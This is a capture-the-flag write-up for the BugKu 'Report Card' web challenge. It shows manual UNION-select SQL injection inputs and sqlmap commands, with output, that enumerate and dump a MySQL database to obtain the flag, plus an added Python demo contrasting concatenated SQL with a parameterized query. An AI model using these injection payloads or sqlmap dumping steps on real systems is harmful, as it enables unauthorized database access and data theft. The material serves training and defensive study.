BugKuCTF WEB: Report Card (成绩单)
http://123.206.87.240:8002/chengjidan/
Solution:
Version 1
Input: 0' union select database(),2,3,4 #
Database name: skctf_flag
Input: 0' union select table_name,2,3,4 from information_schema.tables where table_schema='skctf_flag'#
Table name: fl4g
Input: 0' union select column_name,2,3,4 from information_schema.columns where table_name='fl4g'#
Column name: skctf_flag
Input: 0' union select skctf_flag,2,3,4 from fl4g#
flag: BUGKU{Sql_INJECT0N_4813drd8hz4}
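Why the Version 1 input works, and what stops it, as an added example that is not part of the original write-up or the challenge's code. The server-side query shape is an assumption (four selected columns, id pasted inside quotes), SQLite stands in for MySQL (so the trailing # becomes "-- "), and all rows are constructed.

```python
import sqlite3

# Adapted from the write-up's final input; SQLite has no '#' comment, so '-- ' is used.
PAYLOAD = "0' union select skctf_flag,2,3,4 from fl4g-- "
COLS = "name, math, chinese, english"


def make_db():
    """Constructed stand-in for the challenge database (all rows are made up)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sc (id INTEGER, name TEXT, math INT, chinese INT, english INT);
        INSERT INTO sc VALUES (1, 'student-a', 60, 70, 60), (2, 'student-b', 70, 74, 84);
        CREATE TABLE fl4g (skctf_flag TEXT);
        INSERT INTO fl4g VALUES ('PLACEHOLDER{constructed}');
    """)
    return db


def lookup_vulnerable(db, user_id):
    # Assumed flaw: the id is concatenated inside the quotes, so a quote in the
    # input closes the string literal and the remainder is parsed as SQL.
    sql = "SELECT " + COLS + " FROM sc WHERE id = '" + user_id + "'"
    return db.execute(sql).fetchall()


def lookup_safe(db, user_id):
    # Validate the type first: a student id must be a plain integer.
    try:
        student_id = int(user_id)
    except ValueError:
        return []
    # Bind the value as a parameter: it is sent as data and never parsed as SQL,
    # so binding alone would already keep the payload from changing the query.
    sql = "SELECT " + COLS + " FROM sc WHERE id = ?"
    return db.execute(sql, (student_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1"))      # normal lookup
    print(lookup_vulnerable(db, PAYLOAD))  # UNION row from fl4g leaks
    print(lookup_safe(db, PAYLOAD))        # rejected, nothing returned
```

The same fix on the PHP/MySQL side is a prepared statement with a bound id; the database account used by the page should also have no read access to tables it does not need.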
Version 2
Tool: sqlmap
Detect the SQL injection with sqlmap
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1"
Result
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
---
Parameter: id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'fELh'='fELh

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-7971' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x4156665a546b554a6a64424c6354514d526f575257527a65414d586d516d6a765548776476594570,0x716b707671),NULL-- ErNP
---
[11:01:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
Database: MySQL
Enumerate the databases
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" --dbs
Result
available databases [2]:
[*] information_schema
[*] skctf_flag
Database: skctf_flag
Enumerate the tables in database skctf_flag
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --tables
Result
Database: skctf_flag
[2 tables]
+------+
| fl4g |
| sc   |
+------+
Tables in skctf_flag:
fl4g
sc
Dump the contents
python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump
Result
Database: skctf_flag
Table: sc
[3 entries]
+----+------+------+---------+---------+
| id | name | math | chinese | english |
+----+------+------+---------+---------+
| 1 | 龙龙龙 | 60 | 70 | 60 |
| 2 | 浩儿 | 70 | 74 | 84 |
| 3 | 静静 | 80 | 90 | 85 |
+----+------+------+---------+---------+
[11:13:09] [INFO] table 'skctf_flag.sc' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\120.24.86.145\dump\skctf_flag\sc.csv'
[11:13:09] [INFO] fetching columns for table 'fl4g' in database 'skctf_flag'
[11:13:09] [INFO] used SQL query returns 1 entries
[11:13:09] [INFO] fetching entries for table 'fl4g' in database 'skctf_flag'
[11:13:09] [INFO] used SQL query returns 1 entries
[11:13:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:13:09] [INFO] fetching number of entries for table 'fl4g' in database 'skctf_flag'
[11:13:09] [WARNING] time-based comparison requires larger statistical model, please wait................ (done)
[11:13:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[11:17:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[11:18:03] [INFO] adjusting time delay to 2 seconds due to good response times
BUGKU
[11:18:42] [ERROR] invalid character detected. retrying..
[11:18:42] [WARNING] increasing time delay to 3 seconds
{Sq
[11:20:01] [ERROR] invalid character detected. retrying..
[11:20:01] [WARNING] increasing time delay to 4 seconds
l_INJE
[11:21:48] [ERROR] invalid character detected. retrying..
[11:21:48] [WARNING] increasing time delay to 5 seconds
CT0N_4
[11:24:01] [ERROR] invalid character detected. retrying..
[11:24:01] [WARNING] increasing time delay to 6 seconds
81
[11:24:54] [ERROR] invalid character detected. retrying..
[11:24:54] [WARNING] increasing time delay to 7 seconds
3dr
[11:26:24] [ERROR] invalid character detected. retrying..
[11:26:24] [WARNING] increasing time delay to 8 seconds
d
[11:27:10] [ERROR] invalid character detected. retrying..
[11:27:10] [WARNING] increasing time delay to 9 seconds
8hz4}
Database: skctf_flag
Table: fl4g
[1 entry]
+---------------------------------+
| skctf_flag                      |
+---------------------------------+
| BUGKU{Sql_INJECT0N_4813drd8hz4} |
+---------------------------------+
flag: BUGKU{Sql_INJECT0N_4813drd8hz4}